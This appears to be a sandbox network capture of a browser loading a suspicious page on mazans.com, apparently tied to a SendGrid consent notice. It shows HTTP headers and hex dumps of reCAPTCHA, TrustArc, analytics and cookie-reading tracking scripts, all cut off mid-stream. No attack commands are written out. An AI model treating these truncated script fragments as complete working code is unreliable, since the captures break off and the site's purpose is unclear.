                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          29192.168.2.1749807142.250.186.1644436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC669OUTGET /recaptcha/api.js?render=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC629INData Raw: 35 62 63 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 5bc/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC846INData Raw: 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: V+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.coo
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          30192.168.2.174981213.225.78.574436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC578OUTGET /notice?domain=sendgrid.com&c=teconsent&gtm=1&js=nj&noticeType=bb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 590590f04f79f692591f9db0e720a31c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: jZ9nXibROd_peY7HKVQhlKaPEd97agBJEiBA3_8hlXQO4BQUj_Pnbw==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC15932INData Raw: 33 66 36 30 0d 0a 76 61 72 20 74 72 75 73 74 65 3d 77 69 6e 64 6f 77 2e 74 72 75 73 74 65 7c 7c 7b 7d 3b 74 72 75 73 74 65 2e 62 6e 7c 7c 28 74 72 75 73 74 65 2e 62 6e 3d 7b 7d 29 3b 74 72 75 73 74 65 2e 65 75 7c 7c 28 74 72 75 73 74 65 2e 65 75 3d 7b 7d 29 3b 74 72 75 73 74 65 2e 75 74 69 6c 7c 7c 28 74 72 75 73 74 65 2e 75 74 69 6c 3d 7b 7d 29 3b 0a 74 72 75 73 74 65 2e 75 74 69 6c 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 64 2c 67 29 7b 67 3d 67 7c 7c 7b 7d 3b 76 61 72 20 66 3d 64 26 26 64 2e 74 6f 53 74 72 69 6e 67 28 29 7c 7c 22 22 2c 63 3d 67 2e 63 61 6c 6c 65 72 7c 7c 22 22 3b 69 66 28 64 26 26 64 2e 73 74 61 63 6b 29 7b 66 2b 3d 22 5c 6e 22 2b 64 2e 73 74 61 63 6b 2e 6d 61 74 63 68 28 2f 28 40 7c 61 74 29 5b 5e 5c 6e 5c 72 5c 74 5d 2a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 3f60var truste=window.truste||{};truste.bn||(truste.bn={});truste.eu||(truste.eu={});truste.util||(truste.util={});truste.util.error=function(h,d,g){g=g||{};var f=d&&d.toString()||"",c=g.caller||"";if(d&&d.stack){f+="\n"+d.stack.match(/(@|at)[^\n\r\t]*
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC300INData Raw: 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 22 3b 68 2e 73 74 79 6c 65 73 3d 7b 7d 3b 68 2e 65 78 74 65 72 6e 61 6c 63 73 73 3d 74 79 70 65 6f 66 20 24 74 65 6d 70 5f 65 78 74 65 72 6e 61 6c 63 73 73 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 24 74 65 6d 70 5f 65 78 74 65 72 6e 61 6c 63 73 73 3b 0a 68 2e 73 74 79 6c 65 73 2e 63 6c 6f 73 65 62 74 6e 6c 69 6e 6b 3d 74 79 70 65 6f 66 20 24 74 65 6d 70 5f 63 6c 6f 73 65 62 74 6e 6c 69 6e 6b 5f 73 74 79 6c 65 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 24 74 65 6d 70 5f 63 6c 6f 73 65 62 74 6e 6c 69 6e 6b 5f 73 74 79 6c 65 3b 68 2e 73 74 79 6c 65 73 2e 63 6c 6f 73 65 62 74 6e 3d 74 79 70 65 6f 66 20 24 74 65 6d 70 5f 63 6c 6f 73 65 62 74 6e 5f 73 74 79 6c 65 21 3d 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: hidden !important;}";h.styles={};h.externalcss=typeof $temp_externalcss!="undefined"&&$temp_externalcss;h.styles.closebtnlink=typeof $temp_closebtnlink_style!="undefined"&&$temp_closebtnlink_style;h.styles.closebtn=typeof $temp_closebtn_style!="undefine
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC16384INData Raw: 34 61 30 33 0d 0a 6c 61 79 3d 74 79 70 65 6f 66 20 24 74 65 6d 70 5f 62 6f 78 5f 6f 76 65 72 6c 61 79 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 24 74 65 6d 70 5f 62 6f 78 5f 6f 76 65 72 6c 61 79 3b 68 2e 73 74 79 6c 65 73 2e 62 6f 78 5f 6f 76 65 72 6c 61 79 5f 62 6f 72 64 65 72 3d 74 79 70 65 6f 66 20 24 74 65 6d 70 5f 62 6f 78 5f 6f 76 65 72 6c 61 79 5f 62 6f 72 64 65 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 24 74 65 6d 70 5f 62 6f 78 5f 6f 76 65 72 6c 61 79 5f 62 6f 72 64 65 72 3b 0a 68 2e 73 74 79 6c 65 73 2e 6f 76 65 72 6c 61 79 3d 74 79 70 65 6f 66 20 24 74 65 6d 70 5f 6f 76 65 72 6c 61 79 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 24 74 65 6d 70 5f 6f 76 65 72 6c 61 79 3b 68 2e 73 74 79 6c 65 73 2e 69 6e 6e 65 72 5f 69 66 72 61 6d 65 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 4a03lay=typeof $temp_box_overlay!="undefined"&&$temp_box_overlay;h.styles.box_overlay_border=typeof $temp_box_overlay_border!="undefined"&&$temp_box_overlay_border;h.styles.overlay=typeof $temp_overlay!="undefined"&&$temp_overlay;h.styles.inner_iframe=
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC2571INData Raw: 6e 74 42 79 49 64 28 79 2e 69 61 62 50 61 72 74 6e 65 72 73 4c 69 6e 6b 29 3b 69 66 28 54 29 7b 54 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 75 73 74 65 2e 65 75 2e 63 6c 69 63 6b 4c 69 73 74 65 6e 65 72 28 35 29 3b 0a 50 2e 72 65 74 75 72 6e 46 6f 63 75 73 54 6f 3d 79 2e 69 61 62 50 61 72 74 6e 65 72 73 4c 69 6e 6b 2e 72 65 70 6c 61 63 65 28 22 23 22 2c 22 22 29 7d 3b 54 2e 6f 6e 6b 65 79 75 70 3d 66 75 6e 63 74 69 6f 6e 28 56 29 7b 69 66 28 56 2e 6b 65 79 43 6f 64 65 3d 3d 31 33 29 7b 74 72 75 73 74 65 2e 65 75 2e 63 6c 69 63 6b 4c 69 73 74 65 6e 65 72 28 35 29 3b 0a 50 2e 72 65 74 75 72 6e 46 6f 63 75 73 54 6f 3d 79 2e 69 61 62 50 61 72 74 6e 65 72 73 4c 69 6e 6b 2e 72 65 70 6c 61 63 65 28 22 23 22 2c 22 22 29 7d 7d 7d 54 3d 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ntById(y.iabPartnersLink);if(T){T.onclick=function(){truste.eu.clickListener(5);P.returnFocusTo=y.iabPartnersLink.replace("#","")};T.onkeyup=function(V){if(V.keyCode==13){truste.eu.clickListener(5);P.returnFocusTo=y.iabPartnersLink.replace("#","")}}}T=d
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          31192.168.2.1749808142.250.186.1644436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC976OUTPOST /ccm/collect?en=page_view&dr=sepedatua.com&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=63676415.1731515350&auid=1581689275.1731515350&npa=0&gtm=45He4b70v9126943770za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101823848~101925629~102077855&tft=1731515350241&tfd=6554&apve=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC574INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          Vary: X-Origin
                                                                                                                                                                                                                                                                                                                                                                          Vary: Referer
                                                                                                                                                                                                                                                                                                                                                                          Server: scaffolding on HTTPServer2
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: date,vary,vary,vary,server,content-length
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          32192.168.2.1749813143.204.98.114436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC560OUTGET /sxp/i/c6a47dab391ea1c8a8b2709f8479395d.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: euob.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=43200
                                                                                                                                                                                                                                                                                                                                                                          Expires: Thu, 14 Nov 2024 02:34:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "1b029-rANHG+5y9EkyGGgyif0zejNBMYI"
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 bee9d99ac2913ec4167e166e6bdb691e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA50-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 7Gg9mpi1YLNgZK4Lv9xUSBwRFKC2F-puXp-rzFkCuOQ8_XfMHwxSGg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 6887
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 66 39 62 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 6e 5b 65 5d 29 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 65 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 72 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 74 2c 72 2e 63 3d 6e 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 2e 6f 28 74 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 7d 29 7d 2c 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: f9ba!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 65 74 75 72 6e 20 78 2e 24 74 28 22 5f 75 65 74 76 69 64 22 29 7c 7c 22 2d 22 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 22 2d 22 7d 2c 4b 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 74 3d 61 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 2f 5f 67 61 63 5f 55 41 5c 2d 5c 64 2b 5c 2d 5c 64 2b 5c 3d 28 2e 2a 3f 29 5c 3b 2f 29 5b 31 5d 3b 69 66 28 33 3d 3d 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 3b 69 66 28 6d 2e 47 28 6e 29 29 72 65 74 75 72 6e 20 6d 2e 56 28 28 78 2e 48 74 28 29 2d 31 65 33 2a 6d 2e 56 28 6e 29 29 2f 31 65 33 29 7d 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 22 2d 22 7d 2c 5a 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: eturn x.$t("_uetvid")||"-"}catch(t){}return"-"},Kn:function(){try{var t=a.cookie.match(/_gac_UA\-\d+\-\d+\=(.*?)\;/)[1];if(3===t.split(".").length){var n=t.split(".")[1];if(m.G(n))return m.V((x.Ht()-1e3*m.V(n))/1e3)}}catch(t){}return"-"},Zn:function(){try
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 65 6d 65 6e 74 73 2e 70 75 73 68 28 6e 29 7d 3b 6a 3f 79 2e 58 6e 28 22 63 74 22 2c 4f 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 72 79 7b 69 66 28 6e 29 4f 3d 28 4f 2b 3d 22 26 78 65 72 3d 22 2b 43 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6e 29 29 29 2e 72 65 70 6c 61 63 65 28 2f 26 61 62 5c 3d 2e 2a 3f 28 26 7c 24 29 2f 2c 22 26 61 62 3d 6a 78 2e 34 2e 32 3b 24 31 22 29 2c 52 28 4f 29 2c 67 5b 4a 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 65 2c 69 2c 61 2c 6f 2c 63 29 7b 56 28 74 2c 6e 2c 72 2c 65 2c 69 2c 61 2c 6f 2c 63 29 7d 3b 65 6c 73 65 20 69 66 28 74 29 7b 76 61 72 20 72 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 2c 65 3d 72 2e 63 7c 7c 22 22 3b 56 28 72 2c 65 2c 72 2e 72 61 29 7d 7d 63 61 74 63 68 28 74 29 7b 7d 7d 29 3a 52 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ements.push(n)};j?y.Xn("ct",O,function(t,n){try{if(n)O=(O+="&xer="+C(JSON.stringify(n))).replace(/&ab\=.*?(&|$)/,"&ab=jx.4.2;$1"),R(O),g[J]=function(t,n,r,e,i,a,o,c){V(t,n,r,e,i,a,o,c)};else if(t){var r=JSON.parse(t),e=r.c||"";V(r,e,r.ra)}}catch(t){}}):R(
